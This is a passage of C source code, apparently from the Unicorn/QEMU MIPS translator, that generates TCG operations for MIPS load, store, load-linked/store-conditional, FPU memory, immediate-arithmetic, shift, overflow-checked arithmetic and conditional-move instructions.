OPC_LW: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESL | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LHE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LH: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESW | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LHUE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LHU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUW | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LBE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LB: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_SB); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LBUE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LBU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWLE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LWL: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with 
the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); #ifndef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL); tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); t2 = tcg_const_tl(tcg_ctx, -1); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWRE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LWR: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL); tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); tcg_gen_xori_tl(tcg_ctx, t1, t1, 31); t2 = tcg_const_tl(tcg_ctx, 0xfffffffeull); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LLE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LL: case R6_OPC_LL: op_ld_ll(tcg_ctx, t0, t0, mem_idx, ctx); gen_store_gpr(tcg_ctx, t0, rt); break; } tcg_temp_free(tcg_ctx, t0); } static void gen_llwp(DisasContext *ctx, uint32_t base, int16_t offset, uint32_t reg1, uint32_t reg2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv taddr = tcg_temp_new(tcg_ctx); TCGv_i64 tval = tcg_temp_new_i64(tcg_ctx); TCGv tmp1 = tcg_temp_new(tcg_ctx); TCGv tmp2 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, taddr, base, offset); tcg_gen_qemu_ld64(tcg_ctx, tval, taddr, ctx->mem_idx); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_extr_i64_tl(tcg_ctx, tmp2, tmp1, tval); #else tcg_gen_extr_i64_tl(tcg_ctx, tmp1, tmp2, tval); #endif gen_store_gpr(tcg_ctx, tmp1, reg1); tcg_temp_free(tcg_ctx, tmp1); gen_store_gpr(tcg_ctx, tmp2, reg2); tcg_temp_free(tcg_ctx, tmp2); tcg_gen_st_i64(tcg_ctx, tval, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval_wp)); tcg_temp_free_i64(tcg_ctx, tval); tcg_gen_st_tl(tcg_ctx, taddr, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); tcg_temp_free(tcg_ctx, taddr); } /* Store */ static void gen_st(DisasContext *ctx, uint32_t opc, int rt, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int mem_idx = ctx->mem_idx; gen_base_offset_addr(ctx, t0, base, offset); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { #if defined(TARGET_MIPS64) case OPC_SD: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); break; case OPC_SDL: gen_helper_0e2i(sdl, t1, t0, mem_idx); break; case OPC_SDR: gen_helper_0e2i(sdr, t1, t0, mem_idx); break; #endif case OPC_SWE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SW: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); break; case OPC_SHE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SH: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEUW | ctx->default_tcg_memop_mask); break; case OPC_SBE: 
        mem_idx = MIPS_HFLAG_UM;
        /* fall through */
    case OPC_SB:
        tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_8);
        break;
    case OPC_SWLE:
        mem_idx = MIPS_HFLAG_UM;
        /* fall through */
    case OPC_SWL:
        gen_helper_0e2i(swl, t1, t0, mem_idx);
        break;
    case OPC_SWRE:
        mem_idx = MIPS_HFLAG_UM;
        /* fall through */
    case OPC_SWR:
        gen_helper_0e2i(swr, t1, t0, mem_idx);
        break;
    }
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
}

/* Store conditional */
static void gen_st_cond(DisasContext *ctx, int rt, int base, int offset,
                        MemOp tcg_mo, bool eva)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv addr, t0, val;
    TCGLabel *l1 = gen_new_label(tcg_ctx);
    TCGLabel *done = gen_new_label(tcg_ctx);

    t0 = tcg_temp_new(tcg_ctx);
    addr = tcg_temp_new(tcg_ctx);
    /* compare the address against that of the preceding LL */
    gen_base_offset_addr(ctx, addr, base, offset);
    tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, addr, tcg_ctx->cpu_lladdr, l1);
    tcg_temp_free(tcg_ctx, addr);
    tcg_gen_movi_tl(tcg_ctx, t0, 0);
    gen_store_gpr(tcg_ctx, t0, rt);
    tcg_gen_br(tcg_ctx, done);

    gen_set_label(tcg_ctx, l1);
    /* generate cmpxchg */
    val = tcg_temp_new(tcg_ctx);
    gen_load_gpr(tcg_ctx, val, rt);
    tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, tcg_ctx->cpu_lladdr,
                              tcg_ctx->cpu_llval, val,
                              eva ? MIPS_HFLAG_UM : ctx->mem_idx, tcg_mo);
    tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t0, t0, tcg_ctx->cpu_llval);
    gen_store_gpr(tcg_ctx, t0, rt);
    tcg_temp_free(tcg_ctx, val);

    gen_set_label(tcg_ctx, done);
    tcg_temp_free(tcg_ctx, t0);
}

static void gen_scwp(DisasContext *ctx, uint32_t base, int16_t offset,
                     uint32_t reg1, uint32_t reg2, bool eva)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv taddr = tcg_temp_local_new(tcg_ctx);
    TCGv lladdr = tcg_temp_local_new(tcg_ctx);
    TCGv_i64 tval = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 llval = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 val = tcg_temp_new_i64(tcg_ctx);
    TCGv tmp1 = tcg_temp_new(tcg_ctx);
    TCGv tmp2 = tcg_temp_new(tcg_ctx);
    TCGLabel *lab_fail = gen_new_label(tcg_ctx);
    TCGLabel *lab_done = gen_new_label(tcg_ctx);

    gen_base_offset_addr(ctx, taddr, base, offset);

    tcg_gen_ld_tl(tcg_ctx, lladdr, tcg_ctx->cpu_env,
                  offsetof(CPUMIPSState, lladdr));
    tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, taddr, lladdr, lab_fail);

    gen_load_gpr(tcg_ctx, tmp1, reg1);
    gen_load_gpr(tcg_ctx, tmp2, reg2);

#ifdef TARGET_WORDS_BIGENDIAN
    tcg_gen_concat_tl_i64(tcg_ctx, tval, tmp2, tmp1);
#else
    tcg_gen_concat_tl_i64(tcg_ctx, tval, tmp1, tmp2);
#endif

    tcg_gen_ld_i64(tcg_ctx, llval, tcg_ctx->cpu_env,
                   offsetof(CPUMIPSState, llval_wp));
    tcg_gen_atomic_cmpxchg_i64(tcg_ctx, val, taddr, llval, tval,
                               eva ? MIPS_HFLAG_UM : ctx->mem_idx, MO_64);
    if (reg1 != 0) {
        tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg1], 1);
    }
    tcg_gen_brcond_i64(tcg_ctx, TCG_COND_EQ, val, llval, lab_done);

    gen_set_label(tcg_ctx, lab_fail);

    if (reg1 != 0) {
        tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg1], 0);
    }
    gen_set_label(tcg_ctx, lab_done);
    tcg_gen_movi_tl(tcg_ctx, lladdr, -1);
    tcg_gen_st_tl(tcg_ctx, lladdr, tcg_ctx->cpu_env,
                  offsetof(CPUMIPSState, lladdr));
}

/* Load and store */
static void gen_flt_ldst(DisasContext *ctx, uint32_t opc, int ft, TCGv t0)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;

    /*
     * Don't do NOP if destination is zero: we must perform the actual
     * memory access.
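     * Unlike the GPR case there is no hardwired zero register in the
     * FPU, and the access itself may still fault, so the load or store
     * cannot be elided.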
*/ switch (opc) { case OPC_LWC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TESL | ctx->default_tcg_memop_mask); gen_store_fpr32(ctx, fp0, ft); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SWC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, ft); tcg_gen_qemu_st_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_LDC1: { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); gen_store_fpr64(ctx, fp0, ft); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SDC1: { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); tcg_temp_free_i64(tcg_ctx, fp0); } break; default: MIPS_INVAL("flt_ldst"); generate_exception_end(ctx, EXCP_RI); break; } } static void gen_cop1_ldst(DisasContext *ctx, uint32_t op, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); switch (op) { case OPC_LDC1: case OPC_SDC1: check_insn(ctx, ISA_MIPS2); /* Fallthrough */ default: gen_base_offset_addr(ctx, t0, rs, imm); gen_flt_ldst(ctx, op, rt, t0); } } else { generate_exception_err(ctx, EXCP_CpU, 1); } tcg_temp_free(tcg_ctx, t0); } /* Arithmetic with immediate operand */ static void gen_arith_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ if (rt == 0 && opc != OPC_ADDI && opc != OPC_DADDI) { /* * If no destination, treat it as a NOP. * For addi, we must generate the overflow exception when needed. 
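 *
 * The OPC_ADDI/OPC_DADDI cases detect signed overflow with the usual
 * identity: overflow occurred iff both operands have the same sign and
 * the result's sign differs, i.e. the sign bit of
 * (~(rs ^ imm) & (result ^ imm)) is set; the brcondi on >= 0 skips the
 * exception in the no-overflow case.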
*/ return; } switch (opc) { case OPC_ADDI: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case OPC_ADDIU: if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; #if defined(TARGET_MIPS64) case OPC_DADDI: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DADDIU: if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; #endif } } /* Logic with immediate operand */ static void gen_logic_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm; if (rt == 0) { /* If no destination, treat it as a NOP. */ return; } uimm = (uint16_t)imm; switch (opc) { case OPC_ANDI: if (likely(rs != 0)) { tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], 0); } break; case OPC_ORI: if (rs != 0) { tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; case OPC_XORI: if (likely(rs != 0)) { tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; case OPC_LUI: if (rs != 0 && (ctx->insn_flags & ISA_MIPS32R6)) { /* OPC_AUI */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], imm << 16); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm << 16); } break; default: break; } } /* Set on less than with immediate operand */ static void gen_slt_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ TCGv t0; if (rt == 0) { /* If no destination, treat it as a NOP. 
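 * Note that even for SLTIU the immediate has already been
 * sign-extended (uimm above); only the comparison itself is unsigned,
 * which matches the architected behaviour of SLTIU.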
*/ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_SLTI: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_SLTIU: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr[rt], t0, uimm); break; } tcg_temp_free(tcg_ctx, t0); } /* Shifts with immediate operand */ static void gen_shift_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = ((uint16_t)imm) & 0x1f; TCGv t0; if (rt == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_SLL: tcg_gen_shli_tl(tcg_ctx, t0, t0, uimm); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); break; case OPC_SRA: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_SRL: if (uimm != 0) { tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); } else { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_ROTR: if (uimm != 0) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); tcg_gen_rotri_i32(tcg_ctx, t1, t1, uimm); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t1); tcg_temp_free_i32(tcg_ctx, t1); } else { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; #if defined(TARGET_MIPS64) case OPC_DSLL: tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DSRA: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DSRL: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DROTR: if (uimm != 0) { tcg_gen_rotri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_DSLL32: tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DSRA32: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DSRL32: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DROTR32: tcg_gen_rotri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; #endif } tcg_temp_free(tcg_ctx, t0); } /* Arithmetic */ static void gen_arith(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rd == 0 && opc != OPC_ADD && opc != OPC_SUB && opc != OPC_DADD && opc != OPC_DSUB) { /* * If no destination, treat it as a NOP. * For add & sub, we must generate the overflow exception when needed. 
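 * Overflow is detected below without consulting host flags: for
 * t0 = rs + rt, the value (t0 ^ rt) & ~(rs ^ rt) has its sign bit
 * set exactly when rs and rt share a sign and t0's sign differs.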
*/ return; } switch (opc) { case OPC_ADD: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_ADDU: if (rs != 0 && rt != 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_SUB: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* * operands of different sign, first operand and the result * of different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_SUBU: if (rs != 0 && rt != 0) { tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs == 0 && rt != 0) { tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; #if defined(TARGET_MIPS64) case OPC_DADD: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DADDU: if (rs != 0 && rt != 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { 
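/* Both sources are $zero, so fold the result to a constant 0. */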
tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_DSUB: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* * Operands of different sign, first operand and result different * sign. */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DSUBU: if (rs != 0 && rt != 0) { tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; #endif case OPC_MUL: if (likely(rs != 0 && rt != 0)) { tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; } } /* Conditional move */ static void gen_cond_move(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); t1 = tcg_const_tl(tcg_ctx, 0); t2 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t2, rs); switch (opc) { case OPC_MOVN: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[rd], t0, t1, t2, tcg_ctx->cpu_gpr[rd]); break; case OPC_MOVZ: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[rd], t0, t1, t2, tcg_ctx->cpu_gpr[rd]); break; case OPC_SELNEZ: tcg_gen_movcond_tl(tcg_ctx, 